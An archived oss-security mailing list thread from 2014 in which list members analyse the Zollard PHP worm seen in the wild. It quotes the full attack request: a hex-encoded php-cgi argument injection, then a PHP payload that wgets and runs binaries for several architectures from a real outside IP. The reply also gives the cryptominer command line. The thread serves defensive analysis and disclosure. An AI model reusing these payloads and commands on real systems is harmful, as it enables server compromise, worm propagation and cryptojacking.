Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Fri, 10 Oct 2014 22:00:46 +0200
From: Pierre Schweitzer <pierre@...ctos.org>
To: oss-security@...ts.openwall.com
Subject: Re: What does this PHP exploit do?

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I was about to forget: it also makes sure it is started on each
machine reboot by modifying init ramdisk.

This was done through a quick analysis. It would require deeper one.
Maybe someone already did one?

On 10/10/2014 21:55, Pierre Schweitzer wrote:
> Dear Dave,
> 
> Going quickly through the PHP script shows that it downloads lots
> of executables for various architectures to then try to run them
> (hence the chmod +x) on the host it was downloaded. So pretty
> portable worm.
> 
> The executable it downloads appears to have two basic functions: ->
> replicating itself over the network -> starting a cryptocurrency
> miner (CPU miner) on the infected host
> 
> Here is the way it starts the miner: ./minerd -q -B -a scrypt -o
> http://p2pool.org:5643 -u MDFepZz9SpSbFSugUsXVE3CmrdTaKg1SWi -p
> pass
> 
> Cheers, Pierre
> 
> On 10/10/2014 21:28, Dave Horsfall wrote:
>> My apologies if this is off-topic for this list, but out of all
>> the security lists of which I am a member this seems to be the
>> closest one that fits, so please point me to a more appropriate
>> one in that case..
> 
>> I'm trying to figure out what this exploit does; it started
>> around the time that Shellshock did, but I don't think that
>> they're related.
> 
>> It downloads binaries for several architectures (even a MIPS)
>> which amongst other things futzes around with IPTABLES
>> (including blocking the TELNET port) and appears to be
>> self-reproducing.
> 
>> The hex-encoded stuff in the script below decodes to
> 
>> "-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n"
>
>> 
> 
>> but my PHP-fu doesn't quite extend that far (and that 
>> "safe_mode=off" looks a bit suss).
> 
>> Script below, kindly supplied by 0wned boxes the world over (in 
>> this case, Korea):
> 
>> POST 
>> /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
>>
>> 
HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/5.0 (compatible;
>> Zollard; Linux) Content-Type: application/x-www-form-urlencoded 
>> Content-Length: 1817 Connection: close
> 
>> <?php echo "Zollard"; $disablefunc = 
>> @ini_get("disable_functions"); if (!empty($disablefunc)) { 
>> $disablefunc = str_replace(" ","",$disablefunc); $disablefunc = 
>> explode(",",$disablefunc); } function myshellexec($cmd) { global 
>> $disablefunc; $result = ""; if (!empty($cmd)) { if 
>> (is_callable("exec") and !in_array("exec",$disablefunc)) 
>> {exec($cmd,$result); $result = join("\n",$result);} elseif 
>> (($result = `$cmd`) !== FALSE) {} elseif (is_callable("system")
>> and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); 
>> @ob_clean(); system($cmd); $result = @ob_get_contents(); 
>> @ob_clean(); echo $v;} elseif (is_callable("passthru") and 
>> !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); 
>> @ob_clean(); passthru($cmd); $result = @ob_get_contents(); 
>> @ob_clean(); echo $v;} elseif (is_resource($fp =
>> popen($cmd,"r"))) { $result = ""; while(!feof($fp)) {$result .=
>> fread($fp,1024);} pclose($fp); } } return $result; }
>> myshellexec("rm -rf /tmp/armeabi;wget -P /tmp
>> http://119.206.52.15:58455/armeabi;chmod +x /tmp/armeabi");
>> myshellexec("rm -rf /tmp/arm;wget -P /tmp 
>> http://119.206.52.15:58455/arm;chmod +x /tmp/arm");
>> myshellexec("rm -rf /tmp/ppc;wget -P /tmp
>> http://119.206.52.15:58455/ppc;chmod +x /tmp/ppc");
>> myshellexec("rm -rf /tmp/mips;wget -P /tmp 
>> http://119.206.52.15:58455/mips;chmod +x /tmp/mips"); 
>> myshellexec("rm -rf /tmp/mipsel;wget -P /tmp 
>> http://119.206.52.15:58455/mipsel;chmod +x /tmp/mipsel"); 
>> myshellexec("rm -rf /tmp/x86;wget -P /tmp 
>> http://119.206.52.15:58455/x86;chmod +x /tmp/x86");
>> myshellexec("rm -rf /tmp/nodes;wget -P /tmp
>> http://119.206.52.15:58455/nodes;chmod +x /tmp/nodes");
>> myshellexec("rm -rf /tmp/sig;wget -P /tmp 
>> http://119.206.52.15:58455/sig;chmod +x /tmp/sig"); 
>> myshellexec("/tmp/armeabi;/tmp/arm;/tmp/ppc;/tmp/mips;/tmp/mipsel;/tmp/x86;");
>
>>  -- Dave
> 
> 
> 
> 

- -- 
Pierre Schweitzer <pierre at reactos.org>
System & Network Administrator
Senior Kernel Developer
ReactOS Deutschland e.V.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBAgAGBQJUODruAAoJEHVFVWw9WFsLYrYP/j0M2hpR1GkxU2oIRQ619rwm
3st5cMsuGg5W1ROf7Lx4CtTAyKFMId4cbAjJhbq46UJcPH7XlM1afeHaUJQjzD/K
UMQrHLbUby68IrMu+sESG8joGalo65l4zjvNqLHUPIghh4ZBuEM/8/phPCKLFt7g
6iiyJfjB19URlGcbK29hYN0PI12L1IgNcikjTyUZxcR4SOoDjclehpe/+FIRoG3v
O6tunB/bOY1F/QvWk/xx9hG6Rdl2ubruE76//EGUBWPbvBFMyhuCk2OFjvyq7ePL
+ITLEGFQyja2UcdK5xB9FxiuEuWAZGIaL2exVcE9uQmYVmhi1QIwUWIutFLEiURS
P9sCHwWX7mm+zO8xz3iAl1LK5D5GxmvniXMX2dUYM1WzVSTyz4AmGqJhevw2mFus
2VF8oI4CtrcOMvg7jt+HFn2uUV3y4mEiranr6FOmLaAaJ9i6xTsPvMcrV2eoLxTS
0vKeBvywitGWg0zZ6GzcHbc0I2f6TgGoq766mW22jARyFcmdyaFKPq05/Y0hU6bQ
0/u+ol7UPZ65HKQWdnmhYg4GtFHLcNU1qCsgvdz/DCkA0qHoL19TzhzkOEHVvi1U
zYYtyDIIS6WeDJHHly5LrdUDDT5mAxH/LIQgv6a3Lk5zJLcBTO+1YBt2b64lllzy
AIAlkVdwV9PZ2oymEh1I
=Ea5F
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.